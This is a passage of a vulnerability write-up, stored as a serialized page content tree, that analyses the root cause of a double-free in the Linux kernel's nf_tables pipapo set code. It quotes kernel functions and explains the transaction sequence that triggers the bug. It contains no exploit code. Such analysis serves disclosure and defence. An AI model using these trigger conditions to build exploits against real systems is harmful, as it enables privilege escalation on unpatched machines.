",{"type":26,"tag":130,"props":54468,"children":54470},{"className":54469},[],[54471],{"type":32,"value":53599},{"type":32,"value":3339},{"type":26,"tag":130,"props":54474,"children":54476},{"className":54475},[],[54477],{"type":32,"value":53583},{"type":32,"value":54479}," match objects is that the clone has a view of not only already committed ",{"type":26,"tag":130,"props":54481,"children":54483},{"className":54482},[],[54484],{"type":32,"value":53614},{"type":32,"value":54486},"'s that the \"normal\" one has but also a view of the ",{"type":26,"tag":130,"props":54488,"children":54490},{"className":54489},[],[54491],{"type":32,"value":53614},{"type":32,"value":54493},"'s that was still not committed that only exists in the current control-plane. In other words, the control plane makes changes to the clone, and if the commit path is reached, the changes are committed to ",{"type":26,"tag":130,"props":54495,"children":54497},{"className":54496},[],[54498],{"type":32,"value":53599},{"type":32,"value":470},{"type":26,"tag":118,"props":54501,"children":54503},{"id":54502},"root-cause-analysis",[54504],{"type":32,"value":54505},"Root-cause analysis",{"type":26,"tag":35,"props":54507,"children":54508},{},[54509,54511,54517,54519,54524],{"type":32,"value":54510},"So ",{"type":26,"tag":130,"props":54512,"children":54514},{"className":54513},[],[54515],{"type":32,"value":54516},"nf_tables_set_elem_destroy",{"type":32,"value":54518}," being called for both match objects seems like a pretty straightforward double-free of the ",{"type":26,"tag":130,"props":54520,"children":54522},{"className":54521},[],[54523],{"type":32,"value":53614},{"type":32,"value":54525},"s that had already been committed since those will have duplicated views. At first glance, this is some bizarre-looking code. How did this bug come to be? How was it not detected before? Let's try to get to the bottom of it.",{"type":26,"tag":35,"props":54527,"children":54528},{},[54529,54531,54536,54538,54543,54545,54550,54552,54557,54559,54564],{"type":32,"value":54530},"We should now try to understand how to reach that path with the ",{"type":26,"tag":130,"props":54532,"children":54534},{"className":54533},[],[54535],{"type":32,"value":53576},{"type":32,"value":54537}," flag set, which is a member of the private data of a pipapo ",{"type":26,"tag":130,"props":54539,"children":54541},{"className":54540},[],[54542],{"type":32,"value":53614},{"type":32,"value":54544}," that becomes true whenever a change is made to the ",{"type":26,"tag":130,"props":54546,"children":54548},{"className":54547},[],[54549],{"type":32,"value":53622},{"type":32,"value":54551}," during the control-plane pass of a transaction. This is to tell the commit path that this ",{"type":26,"tag":130,"props":54553,"children":54555},{"className":54554},[],[54556],{"type":32,"value":53622},{"type":32,"value":54558}," has changes that have to be committed. If we refer to the code, we see that we can make the ",{"type":26,"tag":130,"props":54560,"children":54562},{"className":54561},[],[54563],{"type":32,"value":53622},{"type":32,"value":54565}," dirty by inserting a new element.",{"type":26,"tag":5512,"props":54567,"children":54569},{"className":19107,"code":54568,"language":4326,"meta":7,"style":7},"static int nft_pipapo_insert(const struct net *net, const struct nft_set *set,\n        const struct nft_set_elem *elem,\n        struct nft_elem_priv **elem_priv)\n{\n[...]\n priv->dirty = true;\n[...]\n}\n",[54570],{"type":26,"tag":130,"props":54571,"children":54572},{"__ignoreMap":7},[54573,54643,54672,54697,54704,54711,54740,54747],{"type":26,"tag":137,"props":54574,"children":54575},{"class":5559,"line":5560},[54576,54580,54584,54589,54593,54597,54601,54606,54610,54615,54619,54623,54627,54631,54635,54639],{"type":26,"tag":137,"props":54577,"children":54578},{"style":5573},[54579],{"type":32,"value":53647},{"type":26,"tag":137,"props":54581,"children":54582},{"style":5573},[54583],{"type":32,"value":53776},{"type":26,"tag":137,"props":54585,"children":54586},{"style":5682},[54587],{"type":32,"value":54588}," nft_pipapo_insert",{"type":26,"tag":137,"props":54590,"children":54591},{"style":5601},[54592],{"type":32,"value":165},{"type":26,"tag":137,"props":54594,"children":54595},{"style":5573},[54596],{"type":32,"value":12244},{"type":26,"tag":137,"props":54598,"children":54599},{"style":5573},[54600],{"type":32,"value":23744},{"type":26,"tag":137,"props":54602,"children":54603},{"style":5601},[54604],{"type":32,"value":54605}," net ",{"type":26,"tag":137,"props":54607,"children":54608},{"style":5590},[54609],{"type":32,"value":7152},{"type":26,"tag":137,"props":54611,"children":54612},{"style":5584},[54613],{"type":32,"value":54614},"net",{"type":26,"tag":137,"props":54616,"children":54617},{"style":5601},[54618],{"type":32,"value":1108},{"type":26,"tag":137,"props":54620,"children":54621},{"style":5573},[54622],{"type":32,"value":12244},{"type":26,"tag":137,"props":54624,"children":54625},{"style":5573},[54626],{"type":32,"value":23744},{"type":26,"tag":137,"props":54628,"children":54629},{"style":5601},[54630],{"type":32,"value":53702},{"type":26,"tag":137,"props":54632,"children":54633},{"style":5590},[54634],{"type":32,"value":7152},{"type":26,"tag":137,"props":54636,"children":54637},{"style":5584},[54638],{"type":32,"value":53622},{"type":26,"tag":137,"props":54640,"children":54641},{"style":5601},[54642],{"type":32,"value":6099},{"type":26,"tag":137,"props":54644,"children":54645},{"class":5559,"line":5412},[54646,54650,54654,54659,54663,54668],{"type":26,"tag":137,"props":54647,"children":54648},{"style":5573},[54649],{"type":32,"value":35497},{"type":26,"tag":137,"props":54651,"children":54652},{"style":5573},[54653],{"type":32,"value":23744},{"type":26,"tag":137,"props":54655,"children":54656},{"style":5601},[54657],{"type":32,"value":54658}," nft_set_elem ",{"type":26,"tag":137,"props":54660,"children":54661},{"style":5590},[54662],{"type":32,"value":7152},{"type":26,"tag":137,"props":54664,"children":54665},{"style":5584},[54666],{"type":32,"value":54667},"elem",{"type":26,"tag":137,"props":54669,"children":54670},{"style":5601},[54671],{"type":32,"value":6099},{"type":26,"tag":137,"props":54673,"children":54674},{"class":5559,"line":5417},[54675,54680,54684,54689,54693],{"type":26,"tag":137,"props":54676,"children":54677},{"style":5573},[54678],{"type":32,"value":54679},"        struct",{"type":26,"tag":137,"props":54681,"children":54682},{"style":5601},[54683],{"type":32,"value":54307},{"type":26,"tag":137,"props":54685,"children":54686},{"style":5590},[54687],{"type":32,"value":54688},"**",{"type":26,"tag":137,"props":54690,"children":54691},{"style":5584},[54692],{"type":32,"value":54316},{"type":26,"tag":137,"props":54694,"children":54695},{"style":5601},[54696],{"type":32,"value":5742},{"type":26,"tag":137,"props":54698,"children":54699},{"class":5559,"line":5642},[54700],{"type":26,"tag":137,"props":54701,"children":54702},{"style":5601},[54703],{"type":32,"value":13471},{"type":26,"tag":137,"props":54705,"children":54706},{"class":5559,"line":5745},[54707],{"type":26,"tag":137,"props":54708,"children":54709},{"style":5601},[54710],{"type":32,"value":12908},{"type":26,"tag":137,"props":54712,"children":54713},{"class":5559,"line":5850},[54714,54719,54723,54728,54732,54736],{"type":26,"tag":137,"props":54715,"children":54716},{"style":5584},[54717],{"type":32,"value":54718}," priv",{"type":26,"tag":137,"props":54720,"children":54721},{"style":5601},[54722],{"type":32,"value":16348},{"type":26,"tag":137,"props":54724,"children":54725},{"style":5584},[54726],{"type":32,"value":54727},"dirty",{"type":26,"tag":137,"props":54729,"children":54730},{"style":5590},[54731],{"type":32,"value":5593},{"type":26,"tag":137,"props":54733,"children":54734},{"style":5573},[54735],{"type":32,"value":15060},{"type":26,"tag":137,"props":54737,"children":54738},{"style":5601},[54739],{"type":32,"value":5604},{"type":26,"tag":137,"props":54741,"children":54742},{"class":5559,"line":5878},[54743],{"type":26,"tag":137,"props":54744,"children":54745},{"style":5601},[54746],{"type":32,"value":12908},{"type":26,"tag":137,"props":54748,"children":54749},{"class":5559,"line":5891},[54750],{"type":26,"tag":137,"props":54751,"children":54752},{"style":5601},[54753],{"type":32,"value":6507},{"type":26,"tag":35,"props":54755,"children":54756},{},[54757],{"type":32,"value":54758},"We also see that when the changes are commited, this flag is then unset.",{"type":26,"tag":5512,"props":54760,"children":54762},{"className":19107,"code":54761,"language":4326,"meta":7,"style":7},"static void nft_pipapo_commit(struct nft_set *set)\n{\n[...]\n if (!priv->dirty)\n  return;\n[...]\n priv->dirty = false;\n[...]\n}\n",[54763],{"type":26,"tag":130,"props":54764,"children":54765},{"__ignoreMap":7},[54766,54806,54813,54820,54851,54862,54869,54896,54903],{"type":26,"tag":137,"props":54767,"children":54768},{"class":5559,"line":5560},[54769,54773,54777,54782,54786,54790,54794,54798,54802],{"type":26,"tag":137,"props":54770,"children":54771},{"style":5573},[54772],{"type":32,"value":53647},{"type":26,"tag":137,"props":54774,"children":54775},{"style":5573},[54776],{"type":32,"value":53652},{"type":26,"tag":137,"props":54778,"children":54779},{"style":5682},[54780],{"type":32,"value":54781}," nft_pipapo_commit",{"type":26,"tag":137,"props":54783,"children":54784},{"style":5601},[54785],{"type":32,"value":165},{"type":26,"tag":137,"props":54787,"children":54788},{"style":5573},[54789],{"type":32,"value":11990},{"type":26,"tag":137,"props":54791,"children":54792},{"style":5601},[54793],{"type":32,"value":53702},{"type":26,"tag":137,"props":54795,"children":54796},{"style":5590},[54797],{"type":32,"value":7152},{"type":26,"tag":137,"props":54799,"children":54800},{"style":5584},[54801],{"type":32,"value":53622},{"type":26,"tag":137,"props":54803,"children":54804},{"style":5601},[54805],{"type":32,"value":5742},{"type":26,"tag":137,"props":54807,"children":54808},{"class":5559,"line":5412},[54809],{"type":26,"tag":137,"props":54810,"children":54811},{"style":5601},[54812],{"type":32,"value":13471},{"type":26,"tag":137,"props":54814,"children":54815},{"class":5559,"line":5417},[54816],{"type":26,"tag":137,"props":54817,"children":54818},{"style":5601},[54819],{"type":32,"value":12908},{"type":26,"tag":137,"props":54821,"children":54822},{"class":5559,"line":5642},[54823,54827,54831,54835,54839,54843,54847],{"type":26,"tag":137,"props":54824,"children":54825},{"style":5610},[54826],{"type":32,"value":18380},{"type":26,"tag":137,"props":54828,"children":54829},{"style":5601},[54830],{"type":32,"value":4625},{"type":26,"tag":137,"props":54832,"children":54833},{"style":5590},[54834],{"type":32,"value":23215},{"type":26,"tag":137,"props":54836,"children":54837},{"style":5584},[54838],{"type":32,"value":54178},{"type":26,"tag":137,"props":54840,"children":54841},{"style":5601},[54842],{"type":32,"value":16348},{"type":26,"tag":137,"props":54844,"children":54845},{"style":5584},[54846],{"type":32,"value":54727},{"type":26,"tag":137,"props":54848,"children":54849},{"style":5601},[54850],{"type":32,"value":5742},{"type":26,"tag":137,"props":54852,"children":54853},{"class":5559,"line":5745},[54854,54858],{"type":26,"tag":137,"props":54855,"children":54856},{"style":5610},[54857],{"type":32,"value":41795},{"type":26,"tag":137,"props":54859,"children":54860},{"style":5601},[54861],{"type":32,"value":5604},{"type":26,"tag":137,"props":54863,"children":54864},{"class":5559,"line":5850},[54865],{"type":26,"tag":137,"props":54866,"children":54867},{"style":5601},[54868],{"type":32,"value":12908},{"type":26,"tag":137,"props":54870,"children":54871},{"class":5559,"line":5878},[54872,54876,54880,54884,54888,54892],{"type":26,"tag":137,"props":54873,"children":54874},{"style":5584},[54875],{"type":32,"value":54718},{"type":26,"tag":137,"props":54877,"children":54878},{"style":5601},[54879],{"type":32,"value":16348},{"type":26,"tag":137,"props":54881,"children":54882},{"style":5584},[54883],{"type":32,"value":54727},{"type":26,"tag":137,"props":54885,"children":54886},{"style":5590},[54887],{"type":32,"value":5593},{"type":26,"tag":137,"props":54889,"children":54890},{"style":5573},[54891],{"type":32,"value":11645},{"type":26,"tag":137,"props":54893,"children":54894},{"style":5601},[54895],{"type":32,"value":5604},{"type":26,"tag":137,"props":54897,"children":54898},{"class":5559,"line":5891},[54899],{"type":26,"tag":137,"props":54900,"children":54901},{"style":5601},[54902],{"type":32,"value":12908},{"type":26,"tag":137,"props":54904,"children":54905},{"class":5559,"line":5909},[54906],{"type":26,"tag":137,"props":54907,"children":54908},{"style":5601},[54909],{"type":32,"value":6507},{"type":26,"tag":35,"props":54911,"children":54912},{},[54913,54915,54920,54922,54927,54929,54934,54936,54941,54943,54949,54951,54957,54959,54964],{"type":32,"value":54914},"We can conclude that as long as we can, in the same transaction, insert a ",{"type":26,"tag":130,"props":54916,"children":54918},{"className":54917},[],[54919],{"type":32,"value":53614},{"type":32,"value":54921}," in the ",{"type":26,"tag":130,"props":54923,"children":54925},{"className":54924},[],[54926],{"type":32,"value":53622},{"type":32,"value":54928}," to make it dirty and then delete the ",{"type":26,"tag":130,"props":54930,"children":54932},{"className":54931},[],[54933],{"type":32,"value":53622},{"type":32,"value":54935},", we will be able to trigger the double-free. But there is another condition: in the commit path, if a ",{"type":26,"tag":130,"props":54937,"children":54939},{"className":54938},[],[54940],{"type":32,"value":53622},{"type":32,"value":54942},"'s ",{"type":26,"tag":130,"props":54944,"children":54946},{"className":54945},[],[54947],{"type":32,"value":54948},"->commit()",{"type":32,"value":54950}," method is executed before its ",{"type":26,"tag":130,"props":54952,"children":54954},{"className":54953},[],[54955],{"type":32,"value":54956},"->destroy()",{"type":32,"value":54958}," method, then the ",{"type":26,"tag":130,"props":54960,"children":54962},{"className":54961},[],[54963],{"type":32,"value":54727},{"type":32,"value":54965}," flag will be unset, and we won't be able to trigger the double-free.",{"type":26,"tag":35,"props":54967,"children":54968},{},[54969],{"type":32,"value":54970},"Let's once again refer to the code and see how these methods are called.",{"type":26,"tag":5512,"props":54972,"children":54974},{"className":19107,"code":54973,"language":4326,"meta":7,"style":7},"static int nf_tables_commit(struct net *net, struct sk_buff *skb)\n{\n[...]\n  case NFT_MSG_DELSET:\n  case NFT_MSG_DESTROYSET: // [1]\n   nft_trans_set(trans)->dead = 1; // [2]\n   list_del_rcu(&nft_trans_set(trans)->list);\n   nf_tables_set_notify(&trans->ctx, nft_trans_set(trans),\n          trans->msg_type, GFP_KERNEL);\n   break;\n  case NFT_MSG_NEWSETELEM: // [3]\n[...]\n   if (te->set->ops->commit &&\n       list_empty(&te->set->pending_update)) {\n    list_add_tail(&te->set->pending_update,\n           &set_update_list);\n   }\n[...]\n }\n\n nft_set_commit_update(&set_update_list);\n[...]\n nf_tables_commit_release(net);\n\n return 0;\n}\n",[54975],{"type":26,"tag":130,"props":54976,"children":54977},{"__ignoreMap":7},[54978,55040,55047,55054,55062,55075,55110,55144,55186,55208,55220,55233,55240,55288,55329,55369,55382,55389,55396,55403,55410,55435,55442,55455,55462,55478],{"type":26,"tag":137,"props":54979,"children":54980},{"class":5559,"line":5560},[54981,54985,54989,54994,54998,55002,55006,55010,55014,55018,55022,55027,55031,55036],{"type":26,"tag":137,"props":54982,"children":54983},{"style":5573},[54984],{"type":32,"value":53647},{"type":26,"tag":137,"props":54986,"children":54987},{"style":5573},[54988],{"type":32,"value":53776},{"type":26,"tag":137,"props":54990,"children":54991},{"style":5682},[54992],{"type":32,"value":54993}," nf_tables_commit",{"type":26,"tag":137,"props":54995,"children":54996},{"style":5601},[54997],{"type":32,"value":165},{"type":26,"tag":137,"props":54999,"children":55000},{"style":5573},[55001],{"type":32,"value":11990},{"type":26,"tag":137,"props":55003,"children":55004},{"style":5601},[55005],{"type":32,"value":54605},{"type":26,"tag":137,"props":55007,"children":55008},{"style":5590},[55009],{"type":32,"value":7152},{"type":26,"tag":137,"props":55011,"children":55012},{"style":5584},[55013],{"type":32,"value":54614},{"type":26,"tag":137,"props":55015,"children":55016},{"style":5601},[55017],{"type":32,"value":1108},{"type":26,"tag":137,"props":55019,"children":55020},{"style":5573},[55021],{"type":32,"value":11990},{"type":26,"tag":137,"props":55023,"children":55024},{"style":5601},[55025],{"type":32,"value":55026}," sk_buff ",{"type":26,"tag":137,"props":55028,"children":55029},{"style":5590},[55030],{"type":32,"value":7152},{"type":26,"tag":137,"props":55032,"children":55033},{"style":5584},[55034],{"type":32,"value":55035},"skb",{"type":26,"tag":137,"props":55037,"children":55038},{"style":5601},[55039],{"type":32,"value":5742},{"type":26,"tag":137,"props":55041,"children":55042},{"class":5559,"line":5412},[55043],{"type":26,"tag":137,"props":55044,"children":55045},{"style":5601},[55046],{"type":32,"value":13471},{"type":26,"tag":137,"props":55048,"children":55049},{"class":5559,"line":5417},[55050],{"type":26,"tag":137,"props":55051,"children":55052},{"style":5601},[55053],{"type":32,"value":12908},{"type":26,"tag":137,"props":55055,"children":55056},{"class":5559,"line":5642},[55057],{"type":26,"tag":137,"props":55058,"children":55059},{"style":5601},[55060],{"type":32,"value":55061},"  case NFT_MSG_DELSET:\n",{"type":26,"tag":137,"props":55063,"children":55064},{"class":5559,"line":5745},[55065,55070],{"type":26,"tag":137,"props":55066,"children":55067},{"style":5601},[55068],{"type":32,"value":55069},"  case NFT_MSG_DESTROYSET:",{"type":26,"tag":137,"props":55071,"children":55072},{"style":5564},[55073],{"type":32,"value":55074}," // [1]\n",{"type":26,"tag":137,"props":55076,"children":55077},{"class":5559,"line":5850},[55078,55083,55088,55093,55097,55101,55105],{"type":26,"tag":137,"props":55079,"children":55080},{"style":5682},[55081],{"type":32,"value":55082},"   nft_trans_set",{"type":26,"tag":137,"props":55084,"children":55085},{"style":5601},[55086],{"type":32,"value":55087},"(trans)->",{"type":26,"tag":137,"props":55089,"children":55090},{"style":5584},[55091],{"type":32,"value":55092},"dead",{"type":26,"tag":137,"props":55094,"children":55095},{"style":5590},[55096],{"type":32,"value":5593},{"type":26,"tag":137,"props":55098,"children":55099},{"style":5626},[55100],{"type":32,"value":7104},{"type":26,"tag":137,"props":55102,"children":55103},{"style":5601},[55104],{"type":32,"value":51676},{"type":26,"tag":137,"props":55106,"children":55107},{"style":5564},[55108],{"type":32,"value":55109}," // [2]\n",{"type":26,"tag":137,"props":55111,"children":55112},{"class":5559,"line":5878},[55113,55118,55122,55126,55131,55135,55140],{"type":26,"tag":137,"props":55114,"children":55115},{"style":5682},[55116],{"type":32,"value":55117},"   list_del_rcu",{"type":26,"tag":137,"props":55119,"children":55120},{"style":5601},[55121],{"type":32,"value":165},{"type":26,"tag":137,"props":55123,"children":55124},{"style":5590},[55125],{"type":32,"value":5694},{"type":26,"tag":137,"props":55127,"children":55128},{"style":5682},[55129],{"type":32,"value":55130},"nft_trans_set",{"type":26,"tag":137,"props":55132,"children":55133},{"style":5601},[55134],{"type":32,"value":55087},{"type":26,"tag":137,"props":55136,"children":55137},{"style":5584},[55138],{"type":32,"value":55139},"list",{"type":26,"tag":137,"props":55141,"children":55142},{"style":5601},[55143],{"type":32,"value":6430},{"type":26,"tag":137,"props":55145,"children":55146},{"class":5559,"line":5891},[55147,55152,55156,55160,55165,55169,55173,55177,55181],{"type":26,"tag":137,"props":55148,"children":55149},{"style":5682},[55150],{"type":32,"value":55151},"   nf_tables_set_notify",{"type":26,"tag":137,"props":55153,"children":55154},{"style":5601},[55155],{"type":32,"value":165},{"type":26,"tag":137,"props":55157,"children":55158},{"style":5590},[55159],{"type":32,"value":5694},{"type":26,"tag":137,"props":55161,"children":55162},{"style":5584},[55163],{"type":32,"value":55164},"trans",{"type":26,"tag":137,"props":55166,"children":55167},{"style":5601},[55168],{"type":32,"value":16348},{"type":26,"tag":137,"props":55170,"children":55171},{"style":5584},[55172],{"type":32,"value":22874},{"type":26,"tag":137,"props":55174,"children":55175},{"style":5601},[55176],{"type":32,"value":1108},{"type":26,"tag":137,"props":55178,"children":55179},{"style":5682},[55180],{"type":32,"value":55130},{"type":26,"tag":137,"props":55182,"children":55183},{"style":5601},[55184],{"type":32,"value":55185},"(trans),\n",{"type":26,"tag":137,"props":55187,"children":55188},{"class":5559,"line":5909},[55189,55194,55198,55203],{"type":26,"tag":137,"props":55190,"children":55191},{"style":5584},[55192],{"type":32,"value":55193},"          trans",{"type":26,"tag":137,"props":55195,"children":55196},{"style":5601},[55197],{"type":32,"value":16348},{"type":26,"tag":137,"props":55199,"children":55200},{"style":5584},[55201],{"type":32,"value":55202},"msg_type",{"type":26,"tag":137,"props":55204,"children":55205},{"style":5601},[55206],{"type":32,"value":55207},", GFP_KERNEL);\n",{"type":26,"tag":137,"props":55209,"children":55210},{"class":5559,"line":5930},[55211,55216],{"type":26,"tag":137,"props":55212,"children":55213},{"style":5610},[55214],{"type":32,"value":55215},"   break",{"type":26,"tag":137,"props":55217,"children":55218},{"style":5601},[55219],{"type":32,"value":5604},{"type":26,"tag":137,"props":55221,"children":55222},{"class":5559,"line":5939},[55223,55228],{"type":26,"tag":137,"props":55224,"children":55225},{"style":5601},[55226],{"type":32,"value":55227},"  case NFT_MSG_NEWSETELEM:",{"type":26,"tag":137,"props":55229,"children":55230},{"style":5564},[55231],{"type":32,"value":55232}," // [3]\n",{"type":26,"tag":137,"props":55234,"children":55235},{"class":5559,"line":6191},[55236],{"type":26,"tag":137,"props":55237,"children":55238},{"style":5601},[55239],{"type":32,"value":12908},{"type":26,"tag":137,"props":55241,"children":55242},{"class":5559,"line":6208},[55243,55248,55252,55257,55261,55265,55269,55274,55278,55283],{"type":26,"tag":137,"props":55244,"children":55245},{"style":5610},[55246],{"type":32,"value":55247},"   if",{"type":26,"tag":137,"props":55249,"children":55250},{"style":5601},[55251],{"type":32,"value":4625},{"type":26,"tag":137,"props":55253,"children":55254},{"style":5584},[55255],{"type":32,"value":55256},"te",{"type":26,"tag":137,"props":55258,"children":55259},{"style":5601},[55260],{"type":32,"value":16348},{"type":26,"tag":137,"props":55262,"children":55263},{"style":5584},[55264],{"type":32,"value":53622},{"type":26,"tag":137,"props":55266,"children":55267},{"style":5601},[55268],{"type":32,"value":16348},{"type":26,"tag":137,"props":55270,"children":55271},{"style":5584},[55272],{"type":32,"value":55273},"ops",{"type":26,"tag":137,"props":55275,"children":55276},{"style":5601},[55277],{"type":32,"value":16348},{"type":26,"tag":137,"props":55279,"children":55280},{"style":5584},[55281],{"type":32,"value":55282},"commit",{"type":26,"tag":137,"props":55284,"children":55285},{"style":5590},[55286],{"type":32,"value":55287}," &&\n",{"type":26,"tag":137,"props":55289,"children":55290},{"class":5559,"line":6225},[55291,55296,55300,55304,55308,55312,55316,55320,55325],{"type":26,"tag":137,"props":55292,"children":55293},{"style":5682},[55294],{"type":32,"value":55295},"       list_empty",{"type":26,"tag":137,"props":55297,"children":55298},{"style":5601},[55299],{"type":32,"value":165},{"type":26,"tag":137,"props":55301,"children":55302},{"style":5590},[55303],{"type":32,"value":5694},{"type":26,"tag":137,"props":55305,"children":55306},{"style":5584},[55307],{"type":32,"value":55256},{"type":26,"tag":137,"props":55309,"children":55310},{"style":5601},[55311],{"type":32,"value":16348},{"type":26,"tag":137,"props":55313,"children":55314},{"style":5584},[55315],{"type":32,"value":53622},{"type":26,"tag":137,"props":55317,"children":55318},{"style":5601},[55319],{"type":32,"value":16348},{"type":26,"tag":137,"props":55321,"children":55322},{"style":5584},[55323],{"type":32,"value":55324},"pending_update",{"type":26,"tag":137,"props":55326,"children":55327},{"style":5601},[55328],{"type":32,"value":37790},{"type":26,"tag":137,"props":55330,"children":55331},{"class":5559,"line":6238},[55332,55337,55341,55345,55349,55353,55357,55361,55365],{"type":26,"tag":137,"props":55333,"children":55334},{"style":5682},[55335],{"type":32,"value":55336},"    list_add_tail",{"type":26,"tag":137,"props":55338,"children":55339},{"style":5601},[55340],{"type":32,"value":165},{"type":26,"tag":137,"props":55342,"children":55343},{"style":5590},[55344],{"type":32,"value":5694},{"type":26,"tag":137,"props":55346,"children":55347},{"style":5584},[55348],{"type":32,"value":55256},{"type":26,"tag":137,"props":55350,"children":55351},{"style":5601},[55352],{"type":32,"value":16348},{"type":26,"tag":137,"props":55354,"children":55355},{"style":5584},[55356],{"type":32,"value":53622},{"type":26,"tag":137,"props":55358,"children":55359},{"style":5601},[55360],{"type":32,"value":16348},{"type":26,"tag":137,"props":55362,"children":55363},{"style":5584},[55364],{"type":32,"value":55324},{"type":26,"tag":137,"props":55366,"children":55367},{"style":5601},[55368],{"type":32,"value":6099},{"type":26,"tag":137,"props":55370,"children":55371},{"class":5559,"line":6247},[55372,55377],{"type":26,"tag":137,"props":55373,"children":55374},{"style":5590},[55375],{"type":32,"value":55376},"           &",{"type":26,"tag":137,"props":55378,"children":55379},{"style":5601},[55380],{"type":32,"value":55381},"set_update_list);\n",{"type":26,"tag":137,"props":55383,"children":55384},{"class":5559,"line":6270},[55385],{"type":26,"tag":137,"props":55386,"children":55387},{"style":5601},[55388],{"type":32,"value":37344},{"type":26,"tag":137,"props":55390,"children":55391},{"class":5559,"line":6279},[55392],{"type":26,"tag":137,"props":55393,"children":55394},{"style":5601},[55395],{"type":32,"value":12908},{"type":26,"tag":137,"props":55397,"children":55398},{"class":5559,"line":6288},[55399],{"type":26,"tag":137,"props":55400,"children":55401},{"style":5601},[55402],{"type":32,"value":12185},{"type":26,"tag":137,"props":55404,"children":55405},{"class":5559,"line":6355},[55406],{"type":26,"tag":137,"props":55407,"children":55408},{"emptyLinePlaceholder":18},[55409],{"type":32,"value":6276},{"type":26,"tag":137,"props":55411,"children":55412},{"class":5559,"line":6363},[55413,55418,55422,55426,55431],{"type":26,"tag":137,"props":55414,"children":55415},{"style":5682},[55416],{"type":32,"value":55417}," nft_set_commit_update",{"type":26,"tag":137,"props":55419,"children":55420},{"style":5601},[55421],{"type":32,"value":165},{"type":26,"tag":137,"props":55423,"children":55424},{"style":5590},[55425],{"type":32,"value":5694},{"type":26,"tag":137,"props":55427,"children":55428},{"style":5584},[55429],{"type":32,"value":55430},"set_update_list",{"type":26,"tag":137,"props":55432,"children":55433},{"style":5601},[55434],{"type":32,"value":6430},{"type":26,"tag":137,"props":55436,"children":55437},{"class":5559,"line":6393},[55438],{"type":26,"tag":137,"props":55439,"children":55440},{"style":5601},[55441],{"type":32,"value":12908},{"type":26,"tag":137,"props":55443,"children":55444},{"class":5559,"line":6401},[55445,55450],{"type":26,"tag":137,"props":55446,"children":55447},{"style":5682},[55448],{"type":32,"value":55449}," nf_tables_commit_release",{"type":26,"tag":137,"props":55451,"children":55452},{"style":5601},[55453],{"type":32,"value":55454},"(net);\n",{"type":26,"tag":137,"props":55456,"children":55457},{"class":5559,"line":6433},[55458],{"type":26,"tag":137,"props":55459,"children":55460},{"emptyLinePlaceholder":18},[55461],{"type":32,"value":6276},{"type":26,"tag":137,"props":55463,"children":55464},{"class":5559,"line":6441},[55465,55470,55474],{"type":26,"tag":137,"props":55466,"children":55467},{"style":5610},[55468],{"type":32,"value":55469}," return",{"type":26,"tag":137,"props":55471,"children":55472},{"style":5626},[55473],{"type":32,"value":5629},{"type":26,"tag":137,"props":55475,"children":55476},{"style":5601},[55477],{"type":32,"value":5604},{"type":26,"tag":137,"props":55479,"children":55480},{"class":5559,"line":6501},[55481],{"type":26,"tag":137,"props":55482,"children":55483},{"style":5601},[55484],{"type":32,"value":6507},{"type":26,"tag":35,"props":55486,"children":55487},{},[55488,55489,55495,55497,55502],{"type":32,"value":19206},{"type":26,"tag":130,"props":55490,"children":55492},{"className":55491},[],[55493],{"type":32,"value":55494},"nft_set_commit_update()",{"type":32,"value":55496}," function in the code above will call the ",{"type":26,"tag":130,"props":55498,"children":55500},{"className":55499},[],[55501],{"type":32,"value":54948},{"type":32,"value":55503}," method for any objects that were marked as pending an update.",{"type":26,"tag":5512,"props":55505,"children":55507},{"className":19107,"code":55506,"language":4326,"meta":7,"style":7},"static void nft_set_commit_update(struct list_head *set_update_list)\n{\n struct nft_set *set, *next;\n\n list_for_each_entry_safe(set, next, set_update_list, pending_update) {\n  list_del_init(&set->pending_update);\n\n  if (!set->ops->commit || set->dead) // [4]\n   continue;\n\n  set->ops->commit(set); // [5]\n }\n}\n",[55508],{"type":26,"tag":130,"props":55509,"children":55510},{"__ignoreMap":7},[55511,55551,55558,55587,55594,55607,55639,55646,55707,55718,55725,55759,55766],{"type":26,"tag":137,"props":55512,"children":55513},{"class":5559,"line":5560},[55514,55518,55522,55526,55530,55534,55539,55543,55547],{"type":26,"tag":137,"props":55515,"children":55516},{"style":5573},[55517],{"type":32,"value":53647},{"type":26,"tag":137,"props":55519,"children":55520},{"style":5573},[55521],{"type":32,"value":53652},{"type":26,"tag":137,"props":55523,"children":55524},{"style":5682},[55525],{"type":32,"value":55417},{"type":26,"tag":137,"props":55527,"children":55528},{"style":5601},[55529],{"type":32,"value":165},{"type":26,"tag":137,"props":55531,"children":55532},{"style":5573},[55533],{"type":32,"value":11990},{"type":26,"tag":137,"props":55535,"children":55536},{"style":5601},[55537],{"type":32,"value":55538}," list_head ",{"type":26,"tag":137,"props":55540,"children":55541},{"style":5590},[55542],{"type":32,"value":7152},{"type":26,"tag":137,"props":55544,"children":55545},{"style":5584},[55546],{"type":32,"value":55430},{"type":26,"tag":137,"props":55548,"children":55549},{"style":5601},[55550],{"type":32,"value":5742},{"type":26,"tag":137,"props":55552,"children":55553},{"class":5559,"line":5412},[55554],{"type":26,"tag":137,"props":55555,"children":55556},{"style":5601},[55557],{"type":32,"value":13471},{"type":26,"tag":137,"props":55559,"children":55560},{"class":5559,"line":5417},[55561,55565,55569,55573,55578,55582],{"type":26,"tag":137,"props":55562,"children":55563},{"style":5573},[55564],{"type":32,"value":23744},{"type":26,"tag":137,"props":55566,"children":55567},{"style":5601},[55568],{"type":32,"value":53702},{"type":26,"tag":137,"props":55570,"children":55571},{"style":5590},[55572],{"type":32,"value":7152},{"type":26,"tag":137,"props":55574,"children":55575},{"style":5601},[55576],{"type":32,"value":55577},"set, ",{"type":26,"tag":137,"props":55579,"children":55580},{"style":5590},[55581],{"type":32,"value":7152},{"type":26,"tag":137,"props":55583,"children":55584},{"style":5601},[55585],{"type":32,"value":55586},"next;\n",{"type":26,"tag":137,"props":55588,"children":55589},{"class":5559,"line":5642},[55590],{"type":26,"tag":137,"props":55591,"children":55592},{"emptyLinePlaceholder":18},[55593],{"type":32,"value":6276},{"type":26,"tag":137,"props":55595,"children":55596},{"class":5559,"line":5745},[55597,55602],{"type":26,"tag":137,"props":55598,"children":55599},{"style":5682},[55600],{"type":32,"value":55601}," list_for_each_entry_safe",{"type":26,"tag":137,"props":55603,"children":55604},{"style":5601},[55605],{"type":32,"value":55606},"(set, next, set_update_list, pending_update) {\n",{"type":26,"tag":137,"props":55608,"children":55609},{"class":5559,"line":5850},[55610,55615,55619,55623,55627,55631,55635],{"type":26,"tag":137,"props":55611,"children":55612},{"style":5682},[55613],{"type":32,"value":55614},"  